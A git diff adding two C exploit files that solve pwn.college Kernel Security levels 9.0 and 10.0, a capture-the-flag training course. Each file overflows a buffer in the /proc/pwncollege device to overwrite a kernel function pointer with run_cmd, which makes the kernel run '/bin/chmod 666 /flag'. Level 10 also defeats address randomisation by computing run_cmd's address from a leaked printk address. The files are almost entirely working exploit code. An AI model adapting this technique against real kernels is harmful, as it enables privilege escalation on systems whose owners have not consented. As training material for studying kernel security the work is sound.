diff --git a/PwnCollege/KernelSecurity/Level10.0/exploit.c b/PwnCollege/KernelSecurity/Level10.0/exploit.c
new file mode 100644
index 0000000..3ae1acd
--- /dev/null
+++ b/PwnCollege/KernelSecurity/Level10.0/exploit.c
@@ -0,0 +1,26 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+struct evil
+{
+  char buffer[256];
+  int (*log_function)(const char *, ...);
+} s;
+
+int main() {
+    int fd = open("/proc/pwncollege", O_WRONLY);
+    memset(s.buffer, '0', 256);
+    write(fd, &s, 256);
+    uint64_t printk_addr;
+    scanf("%llx", &printk_addr);
+    s.log_function = printk_addr - 0xffffffffb90b69a9 + 0xffffffffb9089b30; // run_cmd
+    printf("%llx\n", s.log_function);
+    // run_cmd doesn't use stdin nor stdout. It also doesn't use current working directory. Its CWD is /. The executable should use absolute path.
+    strcpy(s.buffer, "/bin/chmod 666 /flag");
+    write(fd, &s, sizeof(struct evil) - 1);
+}
\ No newline at end of file
diff --git a/PwnCollege/KernelSecurity/Level9.0/exploit.c b/PwnCollege/KernelSecurity/Level9.0/exploit.c
new file mode 100644
index 0000000..5dc5b8b
--- /dev/null
+++ b/PwnCollege/KernelSecurity/Level9.0/exploit.c
@@ -0,0 +1,20 @@
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+struct evil
+{
+  char buffer[256];
+  int (*log_function)(const char *, ...);
+} s;
+
+int main() {
+    int fd = open("/proc/pwncollege", O_WRONLY);
+    strcpy(s.buffer, "/bin/chmod 666 /flag");
+    s.log_function = 0xffffffff81089b30ull; // run_cmd
+    // run_cmd doesn't use stdin nor stdout. It also doesn't use current working directory. Its CWD is /. The executable should use absolute path.
+    write(fd, &s, sizeof(struct evil) - 1);
+}
\ No newline at end of file